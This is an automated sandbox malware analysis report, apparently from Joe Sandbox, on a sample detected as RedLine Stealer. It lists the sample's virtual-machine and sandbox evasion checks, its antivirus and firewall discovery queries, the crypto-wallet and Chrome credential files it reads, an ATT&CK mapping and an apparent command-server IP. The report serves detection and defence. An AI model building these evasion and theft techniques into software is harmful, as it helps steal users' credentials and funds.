            Source: C:\Users\user\Desktop\84Xhvb840M.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\84Xhvb840M.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\84Xhvb840M.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\84Xhvb840M.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\84Xhvb840M.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion:

            barindex
            Query firmware table information (likely to detect VMs)Show sources
            Source: C:\Users\user\Desktop\84Xhvb840M.exeSystem information queried: FirmwareTableInformationJump to behavior
            Tries to detect sandboxes / dynamic malware analysis system (registry check)Show sources
            Source: C:\Users\user\Desktop\84Xhvb840M.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
            Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)Show sources
            Source: C:\Users\user\Desktop\84Xhvb840M.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
            Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)Show sources
            Source: C:\Users\user\Desktop\84Xhvb840M.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
            Source: C:\Users\user\Desktop\84Xhvb840M.exe TID: 7048Thread sleep time: -17524406870024063s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\84Xhvb840M.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\Desktop\84Xhvb840M.exeRegistry key enumerated: More than 149 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
            Source: C:\Users\user\Desktop\84Xhvb840M.exeWindow / User API: threadDelayed 3438Jump to behavior
            Source: C:\Users\user\Desktop\84Xhvb840M.exeWindow / User API: threadDelayed 5015Jump to behavior
            Source: C:\Users\user\Desktop\84Xhvb840M.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
            Source: C:\Users\user\Desktop\84Xhvb840M.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
            Source: C:\Users\user\Desktop\84Xhvb840M.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
            Source: C:\Users\user\Desktop\84Xhvb840M.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
            Source: C:\Users\user\Desktop\84Xhvb840M.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Users\user\Desktop\84Xhvb840M.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: 84Xhvb840M.exe, 00000000.00000002.336671168.0000000000BA8000.00000004.00000020.sdmpBinary or memory string: VMware
            Source: 84Xhvb840M.exe, 00000000.00000002.336671168.0000000000BA8000.00000004.00000020.sdmpBinary or memory string: Win32_VideoController(Standard display types)VMwareASLLHAK1Win32_VideoControllerK1R9HZP8VideoController120060621000000.000000-00068653715display.infMSBDA1LXNHEFMPCI\VEN_15AD&DEV_0405&SUBSYS_040515AD&REV_00\3&61AAA01&0&78OKWin32_ComputerSystemcomputer1280 x 1024 x 4294967296 colorsWOCTLCD9
            Source: 84Xhvb840M.exe, 00000000.00000002.336599037.0000000000AFA000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllb
            Source: C:\Users\user\Desktop\84Xhvb840M.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Users\user\Desktop\84Xhvb840M.exeMemory allocated: page read and write | page guardJump to behavior
            Source: C:\Users\user\Desktop\84Xhvb840M.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\84Xhvb840M.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\84Xhvb840M.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\84Xhvb840M.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\84Xhvb840M.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\84Xhvb840M.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\84Xhvb840M.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\84Xhvb840M.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\84Xhvb840M.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\84Xhvb840M.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\84Xhvb840M.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\84Xhvb840M.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\84Xhvb840M.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\84Xhvb840M.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\84Xhvb840M.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\84Xhvb840M.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
            Source: C:\Users\user\Desktop\84Xhvb840M.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
            Source: C:\Users\user\Desktop\84Xhvb840M.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
            Source: C:\Users\user\Desktop\84Xhvb840M.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
            Source: C:\Users\user\Desktop\84Xhvb840M.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
            Source: C:\Users\user\Desktop\84Xhvb840M.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
            Source: C:\Users\user\Desktop\84Xhvb840M.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct
            Source: 84Xhvb840M.exe, 00000000.00000003.321239094.0000000000BA8000.00000004.00000001.sdmp, 84Xhvb840M.exe, 00000000.00000002.336671168.0000000000BA8000.00000004.00000020.sdmp, 84Xhvb840M.exe, 00000000.00000003.329258803.0000000000BBF000.00000004.00000001.sdmp, 84Xhvb840M.exe, 00000000.00000003.318786310.0000000000BBC000.00000004.00000001.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
            Source: 84Xhvb840M.exe, 00000000.00000002.336671168.0000000000BA8000.00000004.00000020.sdmp, 84Xhvb840M.exe, 00000000.00000003.329258803.0000000000BBF000.00000004.00000001.sdmpBinary or memory string: ramFiles%\Windows Defender\MsMpeng.exe

            Stealing of Sensitive Information:

            barindex
            Yara detected RedLine StealerShow sources
            Source: Yara matchFile source: 0.2.84Xhvb840M.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000000.00000003.273844894.00000000035F0000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.335990015.0000000000402000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: 84Xhvb840M.exe PID: 7120, type: MEMORYSTR
            Source: Yara matchFile source: dump.pcap, type: PCAP
            Tries to steal Crypto Currency WalletsShow sources
            Source: C:\Users\user\Desktop\84Xhvb840M.exeFile opened: C:\Users\user\AppData\Roaming\Ethereum\wallets\Jump to behavior
            Source: C:\Users\user\Desktop\84Xhvb840M.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
            Tries to harvest and steal browser information (history, passwords, etc)Show sources
            Source: C:\Users\user\Desktop\84Xhvb840M.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
            Source: C:\Users\user\Desktop\84Xhvb840M.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
            Source: C:\Users\user\Desktop\84Xhvb840M.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior

            Remote Access Functionality:

            barindex
            Yara detected RedLine StealerShow sources
            Source: Yara matchFile source: 0.2.84Xhvb840M.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000000.00000003.273844894.00000000035F0000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.335990015.0000000000402000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: 84Xhvb840M.exe PID: 7120, type: MEMORYSTR
            Source: Yara matchFile source: dump.pcap, type: PCAP

            Mitre Att&ck Matrix

            Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
            Valid AccountsWindows Management Instrumentation221Path InterceptionPath InterceptionMasquerading1OS Credential Dumping1Security Software Discovery441Remote ServicesInput Capture1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
            Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsDisable or Modify Tools1Input Capture1Process Discovery11Remote Desktop ProtocolArchive Collected Data11Exfiltration Over BluetoothNon-Standard Port1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
            Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Virtualization/Sandbox Evasion341Security Account ManagerVirtualization/Sandbox Evasion341SMB/Windows Admin SharesData from Local System2Automated ExfiltrationIngress Tool Transfer3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
            Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Deobfuscate/Decode Files or Information1NTDSApplication Window Discovery1Distributed Component Object ModelInput CaptureScheduled TransferNon-Application Layer Protocol2SIM Card SwapCarrier Billing Fraud
            Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptObfuscated Files or Information2LSA SecretsSystem Information Discovery123SSHKeyloggingData Transfer Size LimitsApplication Layer Protocol2Manipulate Device CommunicationManipulate App Store Rankings or Ratings
            Replication Through Removable MediaLaunchdRc.commonRc.commonSoftware Packing32Cached Domain CredentialsSystem Owner/User DiscoveryVNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.

            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            84Xhvb840M.exe34%VirustotalBrowse
            84Xhvb840M.exe38%MetadefenderBrowse
            84Xhvb840M.exe79%ReversingLabsWin32.Trojan.AgentTesla
            84Xhvb840M.exe100%Joe Sandbox ML

            Dropped Files

            No Antivirus matches

            Unpacked PE Files

            SourceDetectionScannerLabelLinkDownload
            0.0.84Xhvb840M.exe.400000.0.unpack100%AviraHEUR/AGEN.1141824Download File

            Domains

            No Antivirus matches

            URLs

            SourceDetectionScannerLabelLink
            http://tempuri.org/Entity/Id12Response0%URL Reputationsafe
            http://tempuri.org/0%URL Reputationsafe
            http://tempuri.org/Entity/Id2Response0%URL Reputationsafe
            http://tempuri.org/Entity/Id15V0%Avira URL Cloudsafe
            http://ns.adobe.c/g0%URL Reputationsafe
            http://tempuri.org/Entity/Id21Response0%URL Reputationsafe
            http://tempuri.org/Entity/Id90%URL Reputationsafe
            http://tempuri.org/Entity/Id80%URL Reputationsafe
            http://tempuri.org/Entity/Id50%URL Reputationsafe
            http://tempuri.org/Entity/Id40%URL Reputationsafe
            http://tempuri.org/Entity/Id70%URL Reputationsafe
            http://tempuri.org/Entity/Id60%URL Reputationsafe
            http://tempuri.org/Entity/Id19Response0%URL Reputationsafe
            http://tempuri.org/Entity/Id15Response0%URL Reputationsafe
            http://tempuri.org/Entity/Id6Response0%URL Reputationsafe
            https://api.ip.sb/ip0%URL Reputationsafe
            http://tempuri.org/Entity/Id9Response0%URL Reputationsafe
            http://tempuri.org/Entity/Id200%URL Reputationsafe
            http://tempuri.org/Entity/Id210%URL Reputationsafe
            http://tempuri.org/Entity/Id220%URL Reputationsafe
            http://tempuri.org/Entity/Id230%URL Reputationsafe
            http://tempuri.org/Entity/Id240%URL Reputationsafe
            http://tempuri.org/Entity/Id24Response0%URL Reputationsafe
            http://tempuri.org/Entity/Id1Response0%URL Reputationsafe
            http://94.250.250.300%VirustotalBrowse
            http://94.250.250.300%Avira URL Cloudsafe
            http://tempuri.org/Entity/Id100%URL Reputationsafe
            http://tempuri.org/Entity/Id110%URL Reputationsafe
            http://tempuri.org/Entity/Id120%URL Reputationsafe
            http://tempuri.org/Entity/Id16Response0%URL Reputationsafe
            http://tempuri.org/Entity/Id130%URL Reputationsafe
            http://tempuri.org/Entity/Id140%URL Reputationsafe
            http://tempuri.org/Entity/Id150%URL Reputationsafe
            http://tempuri.org/Entity/Id160%URL Reputationsafe
            http://tempuri.org/Entity/Id170%URL Reputationsafe
            http://tempuri.org/Entity/Id180%URL Reputationsafe
            http://tempuri.org/Entity/Id5Response0%URL Reputationsafe
            http://tempuri.org/Entity/Id190%URL Reputationsafe
            http://tempuri.org/Entity/Id10Response0%URL Reputationsafe
            http://tempuri.org/Entity/Id8Response0%URL Reputationsafe
            http://tempuri.org/Entity/Id23Response0%URL Reputationsafe

            Domains and IPs

            Contacted Domains

            No contacted domains info

            URLs from Memory and Binaries

            NameSourceMaliciousAntivirus DetectionReputation
            http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Text84Xhvb840M.exe, 00000000.00000002.341110308.0000000003980000.00000004.00000001.sdmpfalse
              high
              http://schemas.xmlsoap.org/ws/2005/02/sc/sct84Xhvb840M.exe, 00000000.00000002.341110308.0000000003980000.00000004.00000001.sdmpfalse
                high
                https://duckduckgo.com/chrome_newtab84Xhvb840M.exe, 00000000.00000002.342367539.00000000049A8000.00000004.00000001.sdmp, 84Xhvb840M.exe, 00000000.00000002.341952023.0000000004937000.00000004.00000001.sdmpfalse
                  high
                  http://schemas.xmlsoap.org/ws/2004/04/security/sc/dk84Xhvb840M.exe, 00000000.00000002.341110308.0000000003980000.00000004.00000001.sdmpfalse
                    high
                    https://duckduckgo.com/ac/?q=84Xhvb840M.exe, 00000000.00000002.342367539.00000000049A8000.00000004.00000001.sdmp, 84Xhvb840M.exe, 00000000.00000002.341952023.0000000004937000.00000004.00000001.sdmpfalse
                      high
                      http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#HexBinary84Xhvb840M.exe, 00000000.00000002.341110308.0000000003980000.00000004.00000001.sdmpfalse
                        high
                        http://tempuri.org/Entity/Id12Response84Xhvb840M.exe, 00000000.00000002.341049588.00000000038E1000.00000004.00000001.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        http://tempuri.org/84Xhvb840M.exe, 00000000.00000002.341049588.00000000038E1000.00000004.00000001.sdmp, 84Xhvb840M.exe, 00000000.00000002.341110308.0000000003980000.00000004.00000001.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        http://tempuri.org/Entity/Id2Response84Xhvb840M.exe, 00000000.00000002.341049588.00000000038E1000.00000004.00000001.sdmp, 84Xhvb840M.exe, 00000000.00000002.341110308.0000000003980000.00000004.00000001.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        http://tempuri.org/Entity/Id15V84Xhvb840M.exe, 00000000.00000002.341110308.0000000003980000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        http://ns.adobe.c/g84Xhvb840M.exe, 00000000.00000003.335639728.0000000000D4C000.00000004.00000001.sdmp, 84Xhvb840M.exe, 00000000.00000002.336765168.0000000000D4D000.00000004.00000001.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        http://schemas.xmlsoap.org/ws/2005/02/sc/dk/p_sha184Xhvb840M.exe, 00000000.00000002.341110308.0000000003980000.00000004.00000001.sdmpfalse
                          high
                          http://tempuri.org/Entity/Id21Response84Xhvb840M.exe, 00000000.00000002.341049588.00000000038E1000.00000004.00000001.sdmp, 84Xhvb840M.exe, 00000000.00000002.341110308.0000000003980000.00000004.00000001.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          http://schemas.xmlsoap.org/2005/02/trust/spnego#GSS_Wrap84Xhvb840M.exe, 00000000.00000002.341110308.0000000003980000.00000004.00000001.sdmpfalse
                            high
                            http://tempuri.org/Entity/Id984Xhvb840M.exe, 00000000.00000002.341049588.00000000038E1000.00000004.00000001.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLID84Xhvb840M.exe, 00000000.00000002.341110308.0000000003980000.00000004.00000001.sdmpfalse
                              high
                              http://tempuri.org/Entity/Id884Xhvb840M.exe, 00000000.00000002.341049588.00000000038E1000.00000004.00000001.sdmpfalse
                              • URL Reputation: safe
                              unknown
                              http://tempuri.org/Entity/Id584Xhvb840M.exe, 00000000.00000002.341049588.00000000038E1000.00000004.00000001.sdmpfalse
                              • URL Reputation: safe
                              unknown
                              http://schemas.xmlsoap.org/ws/2004/10/wsat/Prepare84Xhvb840M.exe, 00000000.00000002.341110308.0000000003980000.00000004.00000001.sdmpfalse
                                high
                                http://tempuri.org/Entity/Id484Xhvb840M.exe, 00000000.00000002.341049588.00000000038E1000.00000004.00000001.sdmpfalse
                                • URL Reputation: safe
                                unknown
                                http://tempuri.org/Entity/Id784Xhvb840M.exe, 00000000.00000002.341049588.00000000038E1000.00000004.00000001.sdmpfalse
                                • URL Reputation: safe
                                unknown
                                http://tempuri.org/Entity/Id684Xhvb840M.exe, 00000000.00000002.341049588.00000000038E1000.00000004.00000001.sdmpfalse
                                • URL Reputation: safe
                                unknown
                                http://schemas.xmlsoap.org/ws/2005/02/trust#BinarySecret84Xhvb840M.exe, 00000000.00000002.341110308.0000000003980000.00000004.00000001.sdmpfalse
                                  high
                                  http://tempuri.org/Entity/Id19Response84Xhvb840M.exe, 00000000.00000002.341049588.00000000038E1000.00000004.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  http://docs.oasis-open.org/wss/oasis-wss-rel-token-profile-1.0.pdf#license84Xhvb840M.exe, 00000000.00000002.341110308.0000000003980000.00000004.00000001.sdmpfalse
                                    high
                                    http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Issue84Xhvb840M.exe, 00000000.00000002.341110308.0000000003980000.00000004.00000001.sdmpfalse
                                      high
                                      http://schemas.xmlsoap.org/ws/2004/10/wsat/Aborted84Xhvb840M.exe, 00000000.00000002.341110308.0000000003980000.00000004.00000001.sdmpfalse
                                        high
                                        http://schemas.xmlsoap.org/ws/2005/02/rm/TerminateSequence84Xhvb840M.exe, 00000000.00000002.341049588.00000000038E1000.00000004.00000001.sdmpfalse
                                          high
                                          http://schemas.xmlsoap.org/ws/2004/10/wsat/fault84Xhvb840M.exe, 00000000.00000002.341110308.0000000003980000.00000004.00000001.sdmpfalse
                                            high
                                            http://schemas.xmlsoap.org/ws/2004/10/wsat84Xhvb840M.exe, 00000000.00000002.341110308.0000000003980000.00000004.00000001.sdmpfalse
                                              high
                                              http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKey84Xhvb840M.exe, 00000000.00000002.341110308.0000000003980000.00000004.00000001.sdmpfalse
                                                high
                                                http://tempuri.org/Entity/Id15Response84Xhvb840M.exe, 00000000.00000002.341049588.00000000038E1000.00000004.00000001.sdmp, 84Xhvb840M.exe, 00000000.00000002.341110308.0000000003980000.00000004.00000001.sdmpfalse
                                                • URL Reputation: safe
                                                unknown
                                                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name84Xhvb840M.exe, 00000000.00000002.341110308.0000000003980000.00000004.00000001.sdmpfalse
                                                  high
                                                  http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Renew84Xhvb840M.exe, 00000000.00000002.341110308.0000000003980000.00000004.00000001.sdmpfalse
                                                    high
                                                    http://schemas.xmlsoap.org/ws/2004/10/wscoor/Register84Xhvb840M.exe, 00000000.00000002.341110308.0000000003980000.00000004.00000001.sdmpfalse
                                                      high
                                                      http://tempuri.org/Entity/Id6Response84Xhvb840M.exe, 00000000.00000002.341049588.00000000038E1000.00000004.00000001.sdmp, 84Xhvb840M.exe, 00000000.00000002.341110308.0000000003980000.00000004.00000001.sdmpfalse
                                                      • URL Reputation: safe
                                                      unknown
                                                      http://schemas.xmlsoap.org/ws/2004/04/trust/SymmetricKey84Xhvb840M.exe, 00000000.00000002.341110308.0000000003980000.00000004.00000001.sdmpfalse
                                                        high
                                                        https://api.ip.sb/ip84Xhvb840M.exe, 00000000.00000002.341049588.00000000038E1000.00000004.00000001.sdmpfalse
                                                        • URL Reputation: safe
                                                        unknown
                                                        http://schemas.xmlsoap.org/ws/2004/04/sc84Xhvb840M.exe, 00000000.00000002.341110308.0000000003980000.00000004.00000001.sdmpfalse
                                                          high
                                                          http://schemas.xmlsoap.org/ws/2004/10/wsat/Volatile2PC84Xhvb840M.exe, 00000000.00000002.341110308.0000000003980000.00000004.00000001.sdmpfalse
                                                            high
                                                            http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Cancel84Xhvb840M.exe, 00000000.00000002.341110308.0000000003980000.00000004.00000001.sdmpfalse
                                                              high
                                                              http://tempuri.org/Entity/Id9Response84Xhvb840M.exe, 00000000.00000002.341049588.00000000038E1000.00000004.00000001.sdmp, 84Xhvb840M.exe, 00000000.00000002.341110308.0000000003980000.00000004.00000001.sdmpfalse
                                                              • URL Reputation: safe
                                                              unknown
                                                              https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=84Xhvb840M.exe, 00000000.00000002.342367539.00000000049A8000.00000004.00000001.sdmp, 84Xhvb840M.exe, 00000000.00000002.341952023.0000000004937000.00000004.00000001.sdmpfalse
                                                                high
                                                                http://tempuri.org/Entity/Id2084Xhvb840M.exe, 00000000.00000002.341049588.00000000038E1000.00000004.00000001.sdmpfalse
                                                                • URL Reputation: safe
                                                                unknown
                                                                http://tempuri.org/Entity/Id2184Xhvb840M.exe, 00000000.00000002.341049588.00000000038E1000.00000004.00000001.sdmpfalse
                                                                • URL Reputation: safe
                                                                unknown
                                                                http://tempuri.org/Entity/Id2284Xhvb840M.exe, 00000000.00000002.341049588.00000000038E1000.00000004.00000001.sdmpfalse
                                                                • URL Reputation: safe
                                                                unknown
                                                                http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#Kerberosv5APREQSHA184Xhvb840M.exe, 00000000.00000002.341110308.0000000003980000.00000004.00000001.sdmpfalse
                                                                  high
                                                                  http://tempuri.org/Entity/Id2384Xhvb840M.exe, 00000000.00000002.341049588.00000000038E1000.00000004.00000001.sdmp, 84Xhvb840M.exe, 00000000.00000002.341110308.0000000003980000.00000004.00000001.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  unknown
                                                                  http://schemas.xmlsoap.org/ws/2004/04/security/trust/CK/PSHA184Xhvb840M.exe, 00000000.00000002.341110308.0000000003980000.00000004.00000001.sdmpfalse
                                                                    high
                                                                    http://tempuri.org/Entity/Id2484Xhvb840M.exe, 00000000.00000002.341049588.00000000038E1000.00000004.00000001.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    unknown
                                                                    http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/Issue84Xhvb840M.exe, 00000000.00000002.341110308.0000000003980000.00000004.00000001.sdmpfalse
                                                                      high
                                                                      http://tempuri.org/Entity/Id24Response84Xhvb840M.exe, 00000000.00000002.341049588.00000000038E1000.00000004.00000001.sdmpfalse
                                                                      • URL Reputation: safe
                                                                      unknown
                                                                      http://tempuri.org/Entity/Id1Response84Xhvb840M.exe, 00000000.00000002.341049588.00000000038E1000.00000004.00000001.sdmp, 84Xhvb840M.exe, 00000000.00000002.341110308.0000000003980000.00000004.00000001.sdmpfalse
                                                                      • URL Reputation: safe
                                                                      unknown
                                                                      http://schemas.xmlsoap.org/ws/2005/02/rm/AckRequested84Xhvb840M.exe, 00000000.00000002.341049588.00000000038E1000.00000004.00000001.sdmpfalse
                                                                        high
                                                                        http://schemas.xmlsoap.org/ws/2004/08/addressing/fault$84Xhvb840M.exe, 00000000.00000002.341049588.00000000038E1000.00000004.00000001.sdmpfalse
                                                                          high
                                                                          http://schemas.xmlsoap.org/ws/2004/10/wsat/ReadOnly84Xhvb840M.exe, 00000000.00000002.341110308.0000000003980000.00000004.00000001.sdmpfalse
                                                                            high
                                                                            http://schemas.xmlsoap.org/ws/2004/10/wsat/Replay84Xhvb840M.exe, 00000000.00000002.341110308.0000000003980000.00000004.00000001.sdmpfalse
                                                                              high
                                                                              http://schemas.xmlsoap.org/ws/2005/02/trust/tlsnego84Xhvb840M.exe, 00000000.00000002.341110308.0000000003980000.00000004.00000001.sdmpfalse
                                                                                high
                                                                                http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Base64Binary84Xhvb840M.exe, 00000000.00000002.341110308.0000000003980000.00000004.00000001.sdmpfalse
                                                                                  high
                                                                                  http://schemas.xmlsoap.org/ws/2004/10/wsat/Durable2PC84Xhvb840M.exe, 00000000.00000002.341110308.0000000003980000.00000004.00000001.sdmpfalse
                                                                                    high
                                                                                    http://schemas.xmlsoap.org/ws/2004/04/security/trust/SymmetricKey84Xhvb840M.exe, 00000000.00000002.341110308.0000000003980000.00000004.00000001.sdmpfalse
                                                                                      high
                                                                                      http://schemas.xmlsoap.org/ws/2004/08/addressing84Xhvb840M.exe, 00000000.00000002.341049588.00000000038E1000.00000004.00000001.sdmpfalse
                                                                                        high
                                                                                        http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issue84Xhvb840M.exe, 00000000.00000002.341110308.0000000003980000.00000004.00000001.sdmpfalse
                                                                                          high
                                                                                          http://schemas.xmlsoap.org/ws/2004/10/wsat/Completion84Xhvb840M.exe, 00000000.00000002.341110308.0000000003980000.00000004.00000001.sdmpfalse
                                                                                            high
                                                                                            http://94.250.250.3084Xhvb840M.exe, 00000000.00000002.341578250.0000000003DC2000.00000004.00000001.sdmpfalse
                                                                                            • 0%, Virustotal, Browse
                                                                                            • Avira URL Cloud: safe
                                                                                            unknown
                                                                                            http://schemas.xmlsoap.org/ws/2004/04/trust84Xhvb840M.exe, 00000000.00000002.341110308.0000000003980000.00000004.00000001.sdmpfalse
                                                                                              high
                                                                                              http://tempuri.org/Entity/Id1084Xhvb840M.exe, 00000000.00000002.341049588.00000000038E1000.00000004.00000001.sdmpfalse
                                                                                              • URL Reputation: safe
                                                                                              unknown
